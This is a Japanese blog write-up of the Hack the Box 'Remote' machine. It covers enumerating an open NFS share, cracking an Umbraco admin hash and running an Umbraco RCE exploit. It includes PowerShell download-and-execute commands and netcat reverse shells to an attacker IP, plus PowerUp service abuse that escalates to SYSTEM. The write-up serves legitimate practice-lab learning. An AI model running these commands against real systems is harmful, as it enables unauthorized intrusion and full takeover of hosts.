さんぽしの散歩記

【Hack the Box write-up】Remote

September 06, 2020

はじめに

筆者は Hack the Box 初心者です。 何か訂正や補足、アドバイスなどありましたら、コメントか Twitter までお願いします。 さんぽし(@sanpo_shiho) | Twitter

cheat sheet

以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。 github | sanposhiho/MYCHEATSHEET

machine について

難易度は easy です

スクリーンショット 2020-09-06 10.23.13.png

nmap

kali@kali:~$ nmap -sV -sC 10.10.10.180
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-24 17:31 EDT
Nmap scan report for 10.10.10.180
Host is up (0.25s latency).
Not shown: 992 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_  SYST: Windows_NT
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  mountd        1-3 (RPC #100005)
6666/tcp open  irc?
|_irc-info: Unable to open connection
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 3m33s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-05-24T21:39:03
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 421.47 seconds
kali@kali:~$ nmap -p 111 -script=nfs-ls,nfs-statfs,nfs-showmount 10.10.10.180
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-24 17:50 EDT
Nmap scan report for 10.10.10.180
Host is up (0.28s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-ls: Volume /site_backups
|   access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION  UID         GID         SIZE   TIME                 FILENAME
| rwx------   4294967294  4294967294  4096   2020-05-24T15:25:46  .
| ??????????  ?           ?           ?      ?                    ..
| rwx------   4294967294  4294967294  64     2020-02-20T17:16:39  App_Browsers
| rwx------   4294967294  4294967294  4096   2020-02-20T17:17:19  App_Data
| rwx------   4294967294  4294967294  4096   2020-02-20T17:16:40  App_Plugins
| rwx------   4294967294  4294967294  8192   2020-02-20T17:16:42  Config
| rwx------   4294967294  4294967294  64     2020-02-20T17:16:40  aspnet_client
| rwx------   4294967294  4294967294  49152  2020-02-20T17:16:42  bin
| rwx------   4294967294  4294967294  64     2020-02-20T17:16:42  css
| rwx------   4294967294  4294967294  152    2018-11-01T17:06:44  default.aspx
|_
| nfs-showmount:
|_  /site_backups
| nfs-statfs:
|   Filesystem     1K-blocks   Used        Available   Use%  Maxfilesize  Maxlink
|_  /site_backups  31119356.0  12364276.0  18755080.0  40%   16.0T        1023

Nmap done: 1 IP address (1 host up) scanned in 4.39 seconds
kali@kali:~$ mkdir mnt
kali@kali:~$ mount 10.10.10.180:/site_backups ./mnt/
mount: only root can do that
kali@kali:~$ sudo mount 10.10.10.180:/site_backups ./mnt/
[sudo] password for kali:
kali@kali:~$ cd mnt/
kali@kali:~/mnt$ ls
App_Browsers  App_Data  App_Plugins  aspnet_client  bin  Config  css  default.aspx  Global.asax  Media  scripts  Umbraco  Umbraco_Client  Views  Web.config

/site_backups というのが見えたので手元に mount しています

site_backups にはログらしきものが色々ありましたが、Umbraco.sdf内に怪しい文字列がドバッと出てきます

kali@kali:~/mnt/App_Data$ strings Umbraco.sdf | grep admin
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
[email protected]{"hashAlgorithm":"SHA1"}[email protected]
[email protected]{"hashAlgorithm":"SHA1"}[email protected]
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/password/changepassword change
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/sign-in/loginlogin success
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/sign-in/loginlogin success
User "admin" <[email protected]>192.168.195.1User "smith" <[email protected]>umbraco/user/saveupdating SessionTimeout, SecurityStamp, CreateDate, UpdateDate, Id, HasIdentity
User "admin" <[email protected]>192.168.195.1User "smith" <[email protected]>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <[email protected]>192.168.195.1User "smith" <[email protected]>umbraco/user/saveupdating Key, IsApproved, Groups, UpdateDate; groups assigned: writer
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/sign-in/loginlogin success
User "admin" <[email protected]>192.168.195.1User "smith" <[email protected]>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <[email protected]>192.168.195.1User "smith" <[email protected]>umbraco/user/password/changepassword change
User "admin" <[email protected]>192.168.195.1User "smith" <[email protected]>umbraco/user/saveupdating Key, Groups, UpdateDate; groups assigned: writer
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/sign-in/loginlogin success
User "admin" <[email protected]>192.168.195.1User "ssmith" <[email protected]>umbraco/user/saveupdating Name, Key, Groups, UpdateDate; groups assigned: writer
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/sign-in/loginlogin success
User "admin" <[email protected]>192.168.195.1User "ssmith" <[email protected]>umbraco/user/saveupdating Username, Email, Key, Groups, UpdateDate; groups assigned: writer
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/sign-in/loginlogin success
User "admin" <[email protected]>192.168.195.1User "ssmith" <[email protected]>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <[email protected]>192.168.195.1User "ssmith" <[email protected]>umbraco/user/password/changepassword change
User "admin" <[email protected]>192.168.195.1User "ssmith" <[email protected]>umbraco/user/saveupdating Key, Groups, UpdateDate; groups assigned: writer
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/sign-in/loginlogin success
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/sign-in/logoutlogout success
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/sign-in/loginlogin success
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating FailedPasswordAttempts, UpdateDate
User "admin" <[email protected]>192.168.195.1umbraco/user/sign-in/failedlogin failed
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating FailedPasswordAttempts, UpdateDate
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/sign-in/loginlogin success
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/password/changepassword change
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/sign-in/loginlogin success
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/password/changepassword change
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/sign-in/loginlogin success
adminAdministratorsCADMOSKTPIURZ:5F7
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating TourData, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <[email protected]>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <[email protected]>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <[email protected]>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <[email protected]>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <[email protected]>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <[email protected]>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <[email protected]>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <[email protected]>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <[email protected]>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/sign-in/loginlogin success
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/sign-in/loginlogin success
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
[email protected]{"hashAlgorithm":"SHA1"}[email protected]

この部分ですが、b8be16afba8c314ad33d812f22a04991b90e2aaaを SHA1 でデコードすると baconandcheese となります

スクリーンショット 2020-05-25 13.09.37.png

Umbraco には https://github.com/noraj/Umbraco-RCE の脆弱性があります(もちろんバージョンによってはですが、今年出た CVE ですしかなり怪しい)

kali@kali:~$ python exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c whoami
iis apppool\defaultapppool

RCE が通りました。

こちらのスクリプトで reverse shell を取っていきます(一行目を編集しましょう)(python -m Si(略)を立てましょう) https://gist.github.com/staaldraad/204928a6004e89553a8d3db0ce527fd5

以下で upload します

kali@kali:~$ python exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.32:8000/shell.ps1')"

これで別シェルで nc しておくと reverse shell が取れます

Fully interactive reverse shell on Windows!!

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#fully-interactive-reverse-shell-on-windows

PayloadsAllTheThings を参考にして Fully interactive reverse shell に貼り替えます (PayloadsAllTheThings そのままなので細かい説明は省略)

これで upload し(正確には upload はしてない)、同時に実行します

powershell "IEX(IWR http://10.10.14.32:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.32 3001"

powerup

PS C:\Users\Public> powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"

[*] Running Invoke-AllChecks


[*] Checking if user is in a local group with administrative privileges...


[*] Checking for unquoted service paths...


[*] Checking service executable and argument permissions...


[*] Checking service permissions...


ServiceName   : UsoSvc
Path          : C:\Windows\system32\svchost.exe -k netsvcs -p
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart    : True





[*] Checking %PATH% for potentially hijackable DLL locations...
Test-Path : Access is denied
At C:\Users\Public\PowerUp.ps1:856 char:46
+ ...                  if($ParentPath -and (Test-Path -Path $ParentPath)) {
+                                           ~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\Windows\syst...Local\Microsoft:String) [Test-Path], UnauthorizedAccessException
    + FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.TestPathCommand



[*] Checking for AlwaysInstallElevated registry key...


[*] Checking for Autologon credentials in registry...


[*] Checking for modifidable registry autoruns and configs...

[*] Checking for modifiable schtask files/configs...


[*] Checking for unattended install files...


UnattendPath : C:\Windows\Panther\Unattend.xml




[*] Checking for encrypted web.config strings...


[*] Checking for encrypted application pool and virtual directory passwords...

[*] Checking for plaintext passwords in McAfee SiteList.xml files....




[*] Checking for cached Group Policy Preferences .xml files....

Checking service permissions...UsoSvc と言うサービスが出てくるので Invoke-ServiceAbuse を利用して nc64.exe を実行します

PS C:\Users\Public> Invoke-ServiceAbuse -ServiceName 'UsoSvc' -Command 'C:\Users\Public\nc64.exe  -e cmd.exe 10.10.14.32 3333'

ServiceAbused Command
------------- -------
UsoSvc        C:\Users\Public\nc64.exe  -e cmd.exe 10.10.14.32 3333
kali@kali:~$ nc -lnvp 3333
listening on [any] 3333 ...
connect to [10.10.14.32] from (UNKNOWN) [10.10.10.180] 49713
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>type c:\users\administrator\desktop\root.txt

これで reverse shell が取れました

終わりに

PowerUp の中身種類多すぎて使いこなしきれん…

このエントリーをはてなブックマークに追加